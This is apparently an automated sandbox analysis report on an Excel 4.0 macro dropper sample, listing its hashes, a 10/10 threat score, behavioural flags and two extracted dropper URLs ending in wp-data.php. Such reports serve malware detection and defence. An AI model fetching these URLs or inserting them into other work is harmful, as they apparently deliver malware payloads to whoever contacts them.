General

  • Target

    9fb9f5ccc0af9acbc28bef2fe4bdcf29

  • Size

    36KB

  • Sample

    240216-hqh65acd8z

  • MD5

    9fb9f5ccc0af9acbc28bef2fe4bdcf29

  • SHA1

    aaed45346180ebfd2cf81cf00e86f4eebb58a27c

  • SHA256

    bdf5294285e2792cf563b246673ab836bcf9cf8a9b3065cc45711111decd17a5

  • SHA512

    dbad4076cbe5806952422a787b6962bc2e75b5a6c8b1746ade18b5f9e4c749c72c0e6849542ff87bf1864b2de0b0f76fa38a2720267d4e431b00e92fa1b18018

  • SSDEEP

    768:VPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJemYcwNjCn3T69vrM:dok3hbdlylKsgqopeJBWhZFGkE+cL2NW

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://statedauto.com/wp-data.php

xlm40.dropper

https://markens.online/wp-data.php

Targets

    • Target

      9fb9f5ccc0af9acbc28bef2fe4bdcf29

    • Size

      36KB

    • MD5

      9fb9f5ccc0af9acbc28bef2fe4bdcf29

    • SHA1

      aaed45346180ebfd2cf81cf00e86f4eebb58a27c

    • SHA256

      bdf5294285e2792cf563b246673ab836bcf9cf8a9b3065cc45711111decd17a5

    • SHA512

      dbad4076cbe5806952422a787b6962bc2e75b5a6c8b1746ade18b5f9e4c749c72c0e6849542ff87bf1864b2de0b0f76fa38a2720267d4e431b00e92fa1b18018

    • SSDEEP

      768:VPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJemYcwNjCn3T69vrM:dok3hbdlylKsgqopeJBWhZFGkE+cL2NW

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

MITRE ATT&CK Enterprise v15

Tasks